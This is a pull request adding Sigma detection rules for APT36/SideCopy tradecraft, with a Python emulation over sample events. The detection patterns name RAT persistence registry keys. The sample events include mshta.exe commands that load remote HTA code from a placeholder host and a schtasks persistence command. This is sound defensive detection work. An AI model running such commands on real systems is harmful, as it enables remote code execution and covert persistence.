Add APT36/SideCopy detection rules: CrimsonRAT persistence, XenoRAT task, mshta index.php chain #6076
Open
Pyhroff wants to merge 1 commit into
Three new experimental rules covering Pakistan-linked APT36/SideCopy TTPs
with no prior Sigma coverage:
1. registry_set_apt36_sidecopy_persistence.yml
- Detects CrimsonRAT (\Software\CrimsonRAT), ElizaRAT
(\SYSTEM\ElizaRAT\Persistence), and CapraStart run key writes
- ATT&CK: T1547.001
2. proc_creation_win_apt_sidecopy_xenorat_schtask.yml
- Detects schtasks.exe creating the hardcoded XenoUpdateManager task
used to persist XenoRAT in Operation XENOFISCAL (June 2026)
- ATT&CK: T1053.005
3. proc_creation_win_apt_sidecopy_mshta_index_php.yml
- Detects mshta.exe fetching a remote HTA via an index.php endpoint,
a SideCopy signature TTP documented since 2019 across multiple campaigns
- More specific than the existing generic mshta HTTP rule
- ATT&CK: T1218.005, T1566.001
References: Seqrite Operation XENOFISCAL (2026-06), Talos InSideCopy,
Hacker News APT36 cross-platform RAT campaigns (2026-02).
Welcome @Pyhroff 👋
It looks like this is your first pull request on the Sigma rules repository!
Please make sure to read the SigmaHQ conventions to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.
Thanks again, and welcome to the Sigma community! 😃
If you want to engage more with the community for official support, general discussions or announcements:
Summary
Three new experimental rules covering APT36 (Transparent Tribe) / SideCopy TTPs with no prior Sigma coverage. This Pakistan-linked threat cluster has been consistently targeting Indian and Afghan government/defence networks, with campaigns escalating through 2025–2026 (Operation XENOFISCAL, cross-platform RAT campaign).
Rules added
- registry_set_apt36_sidecopy_persistence.yml: detects CrimsonRAT (\Software\CrimsonRAT), ElizaRAT (\SYSTEM\ElizaRAT\Persistence), CapraStart run key
- proc_creation_win_apt_sidecopy_xenorat_schtask.yml: schtasks.exe creating the hardcoded XenoUpdateManager task used to persist XenoRAT
- proc_creation_win_apt_sidecopy_mshta_index_php.yml: mshta.exe fetching a remote HTA via an index.php endpoint — SideCopy signature TTP since 2019
Why these are not duplicates
proc_creation_win_mshta_http.yml detects any http:// / https:// URL in mshta command lines. The new rule is more specific: it requires index.php in the path, which is the hardcoded endpoint pattern SideCopy uses on compromised PHP servers and reduces analyst fatigue on generic mshta-HTTP noise.
References
False positive notes
\Software\CrimsonRAT, \SYSTEM\ElizaRAT\Persistence, or \Run\CapraStart.
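To make the "not a duplicate" argument concrete, here is an added example (not the PR's Sigma rules, and not Sigma syntax) that emulates the three detections over constructed Sysmon-style events, placing the generic mshta-HTTP logic beside the narrower index.php check so the difference in what fires is visible. Field names, the `example.invalid` host, and all file paths are assumptions.

```python
import re

# Registry paths and task name quoted in the PR description.
PERSISTENCE_KEYS = (r"\Software\CrimsonRAT", r"\SYSTEM\ElizaRAT\Persistence", r"\Run\CapraStart")
XENORAT_TASK = "xenoupdatemanager"
HTTP_URL = re.compile(r"https?://\S+", re.IGNORECASE)

def _image_is(event, exe):
    return event.get("Image", "").lower().endswith("\\" + exe)

def sidecopy_persistence(event):
    """registry_set: a SetValue whose TargetObject contains one of the RAT paths."""
    target = event.get("TargetObject", "").lower()
    return event.get("EventType") == "SetValue" and any(k.lower() in target for k in PERSISTENCE_KEYS)

def xenorat_schtask(event):
    """proc_creation: schtasks.exe creating the hardcoded XenoUpdateManager task."""
    cmd = event.get("CommandLine", "").lower()
    return _image_is(event, "schtasks.exe") and "/create" in cmd and XENORAT_TASK in cmd

def mshta_http_generic(event):
    """Stand-in for the existing generic rule: any http(s) URL on an mshta command line."""
    return _image_is(event, "mshta.exe") and HTTP_URL.search(event.get("CommandLine", "")) is not None

def mshta_index_php(event):
    """The narrower rule: the URL path (query string excluded) must contain index.php."""
    if not mshta_http_generic(event):
        return False
    url = HTTP_URL.search(event["CommandLine"]).group(0)
    return "index.php" in url.split("?", 1)[0].lower()

RULES = {"sidecopy_persistence": sidecopy_persistence, "xenorat_schtask": xenorat_schtask,
         "mshta_http_generic": mshta_http_generic, "mshta_index_php": mshta_index_php}

def fired(event):
    """Names of the rules that match one event, in RULES order."""
    return [name for name, rule in RULES.items() if rule(event)]

# Constructed sample events (Sysmon-style field names); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventType": "SetValue", "TargetObject": r"HKU\S-1-5-21-1\Software\CrimsonRAT\pid"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn XenoUpdateManager /tr "C:\Users\Public\upd.exe" /sc minute'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/files/index.php?id=1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/update.hta"},  # generic rule only
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks.exe /create /tn BackupJob /tr backup.cmd /sc daily"},  # benign
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(fired(event) or "-", event.get("CommandLine") or event.get("TargetObject"))
```

The fourth event shows the overlap the PR describes: the generic rule fires on any mshta URL, while the index.php rule stays quiet until the endpoint pattern is present.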